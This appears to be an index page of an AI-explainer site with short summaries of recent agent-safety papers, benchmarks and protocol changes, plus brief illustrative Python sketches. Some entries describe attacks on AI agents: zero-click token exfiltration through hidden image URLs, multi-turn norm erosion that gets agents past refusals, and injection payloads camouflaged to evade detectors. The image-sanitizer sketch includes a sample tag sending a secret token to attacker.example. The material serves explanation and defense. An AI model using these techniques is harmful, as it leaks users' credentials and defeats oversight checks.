AI Explained
Plain explanations of trending AI concepts, with live visualizations.
AgentDoG 1.5 — Small inline guard models for agent actions — What does it mean?
A small 0.8–8B-parameter model that screens every agent action inline, reportedly matching a closed safety model's catch rate with roughly 100× lower deployment overhead.
Anthropic's Project Glasswing — Detection-saturated vulnerability pipeline — What does it mean?
Glasswing partners found 10,000+ high- or critical-severity vulnerabilities in one month. The detection-saturated dynamic is sharpest where the patcher is a separate organization: of the 530 vulnerabilities Anthropic reported to open-source projects, only 75 were patched after a month.
PromptArmor × Copilot Cowork — Image-URL exfiltration in agent UIs — What does it mean?
PromptArmor showed Microsoft Copilot Cowork posting a Teams message whose hidden <img src> leaks a pre-authenticated OneDrive token the moment the user opens the inbox — zero clicks on a malicious link.
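One common mitigation for this class of leak is to refuse to render images from hosts that are not explicitly trusted. The sketch below is a minimal illustration of that idea, not PromptArmor's or Microsoft's method; the allowlist, the host names, and the function `untrusted_image_urls` are all hypothetical.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the UI is permitted to load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Captures the src attribute of <img> tags (quoted values only; a real
# sanitizer should use a proper HTML parser rather than a regex).
IMG_SRC = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def untrusted_image_urls(html: str) -> list[str]:
    """Return image URLs whose host is not on the allowlist.

    Relative URLs have no host and are flagged too, which is deliberately
    conservative for this sketch.
    """
    flagged = []
    for url in IMG_SRC.findall(html):
        host = urlparse(url).hostname
        if host not in ALLOWED_IMAGE_HOSTS:
            flagged.append(url)
    return flagged


message = '<p>Status update</p><img src="https://attacker.example/p.png?t=SECRET_TOKEN">'
print(untrusted_image_urls(message))
```

A renderer could drop or proxy any flagged URL before display, so that merely opening a message never triggers a request carrying a token in its query string.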
PushBench paper — Quantitative Goal Persistence (QGP) — What does it mean?
PushBench measures Quantitative Goal Persistence — frontier models hold up at 50 artifacts but drop to 3/9 successes at 100; a state-tracking controller restores 69–78% by rejecting duplicate submissions.
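The duplicate-rejection idea can be sketched in a few lines. This is an illustrative toy, assuming artifacts are strings and that duplicates are detected by normalized text; the class `SubmissionTracker` and its normalization rule are hypothetical and are not taken from the PushBench paper.

```python
class SubmissionTracker:
    """Tracks accepted artifacts and rejects repeats (illustrative only)."""

    def __init__(self, target: int) -> None:
        self.target = target          # how many distinct artifacts are required
        self.seen: set[str] = set()   # normalized keys of accepted artifacts

    def submit(self, artifact: str) -> bool:
        # Normalize case and whitespace so trivial variants count as duplicates.
        key = " ".join(artifact.lower().split())
        if key in self.seen:
            return False              # duplicate: reject, progress unchanged
        self.seen.add(key)
        return True

    @property
    def remaining(self) -> int:
        # Distinct artifacts still needed to reach the target.
        return max(self.target - len(self.seen), 0)


tracker = SubmissionTracker(target=3)
results = [tracker.submit(a) for a in ["Alpha", "beta", "alpha ", "gamma"]]
print(results, tracker.remaining)
```

Keeping the count outside the model means progress toward the quantitative goal is measured by the controller rather than by the model's own recollection of what it has already submitted.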
OpenSCAD Pantheon benchmark — Human-in-the-loop vs autonomous coding agents — What does it mean?
ModelRift pitted 6 agentic coding tools against the same OpenSCAD Pantheon task — Antigravity 2.0 in autonomous mode won at 4.5/5 in ~12 min while ModelRift's human-in-the-loop tier hit 3.8/5 in ~10 min.
MCP 2026-07-28 RC — stateless transport — What does it mean?
MCP's 2026-07-28 RC reworks transport so every tools/call request carries its own routing data — any server in the fleet can serve it, no sticky session pin required.
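The property described here can be illustrated with a toy handler that reads everything it needs from the request itself. This is a sketch of the general stateless pattern only; the `Request` fields, the `routing` dictionary, and the `handle` function are hypothetical and do not reflect MCP's actual wire format.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    method: str       # e.g. "tools/call"
    tool: str         # name of the tool to invoke
    arguments: dict   # tool arguments
    routing: dict     # hypothetical per-request routing data


def handle(server_id: str, req: Request) -> dict:
    # No session store is consulted: the request is self-describing, so the
    # result does not depend on which server receives it.
    tenant = req.routing["tenant"]
    return {"tenant": tenant, "tool": req.tool, "result": sum(req.arguments["values"])}


req = Request("tools/call", "add", {"values": [1, 2, 3]}, {"tenant": "acme"})
responses = [handle(server, req) for server in ("server-a", "server-b")]
print(responses[0] == responses[1])
```

Because neither call depends on state held by a particular server, a load balancer is free to send each request to any instance.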
Maestro paper — RL orchestrator over frozen experts — What does it mean?
Maestro trains a 4B RL policy that picks (expert, skill) per task from a frozen model pool — 70.1% across 10 multimodal benchmarks, beating GPT-5 (69.3%), and routes to new experts without retraining.
Boiling the Frog paper — Multi-turn norm erosion vs single-prompt agent safety — What does it mean?
Boiling the Frog walks agents from benign edits to risk-bearing actions across multiple turns — averaging 44.4% attack success on 9 frontier agents that would refuse the same final message asked alone.
Camouflage Injection paper — Camouflage Detection Gap — What does it mean?
Injection payloads rewritten in a document's own domain vocabulary slip past current detectors: Llama 3.1 8B's catch rate drops from 93.8% to 9.7%, and Llama Guard 3 catches none.
OpenComputer paper — Verifier-grounded benchmark synthesis — What does it mean?
OpenComputer builds 1,000 computer-use tasks across 33 desktop apps by writing the executable verifier first, calibrating it, then synthesizing tasks that ground into the verifier endpoints — GPT-5.4 hits 68.3% while open-source agents collapse to as low as 5.7%.
MCP SEP-2106 — Full JSON Schema 2020-12 in tool I/O — What does it mean?
MCP SEP-2106 opens tool inputSchema and outputSchema to the full JSON Schema 2020-12 vocabulary — composition, conditionals, refs — and widens structuredContent from object-only to any value.
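As a rough illustration of what the wider vocabulary allows, the sketch below defines a tool whose input schema uses `$defs`/`$ref` and `if`/`then`/`else`, and whose output schema uses `oneOf` to describe a non-object result. The tool name `resize_image` and all of its fields are hypothetical, and the non-object `outputSchema` is an assumption based on the widened `structuredContent` described above; only the JSON Schema 2020-12 keywords themselves are standard.

```python
import json

tool = {
    "name": "resize_image",  # hypothetical tool, for illustration only
    "inputSchema": {
        "$schema": "https://json-schema.org/draft/2020-12/schema",
        "type": "object",
        # Refs: a reusable definition shared by width and height.
        "$defs": {"pixels": {"type": "integer", "minimum": 1}},
        "properties": {
            "mode": {"enum": ["exact", "scale"]},
            "width": {"$ref": "#/$defs/pixels"},
            "height": {"$ref": "#/$defs/pixels"},
            "factor": {"type": "number", "exclusiveMinimum": 0},
        },
        "required": ["mode"],
        # Conditionals: which fields are required depends on the mode.
        "if": {"properties": {"mode": {"const": "exact"}}},
        "then": {"required": ["width", "height"]},
        "else": {"required": ["factor"]},
    },
    # Composition: the result is either one path or a list of paths,
    # i.e. not an object.
    "outputSchema": {
        "oneOf": [
            {"type": "string"},
            {"type": "array", "items": {"type": "string"}},
        ]
    },
}

print(json.dumps(tool["inputSchema"], indent=2))
```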
EnvFactory paper — Synthetic envs for tool-use agent training — What does it mean?
EnvFactory autonomously synthesizes 85 stateful tool environments, 5× fewer than EnvScaler / AWM, and uses topology-aware trajectory sampling to lift Qwen3 tool-use by up to 15 percentage points on BFCL v3.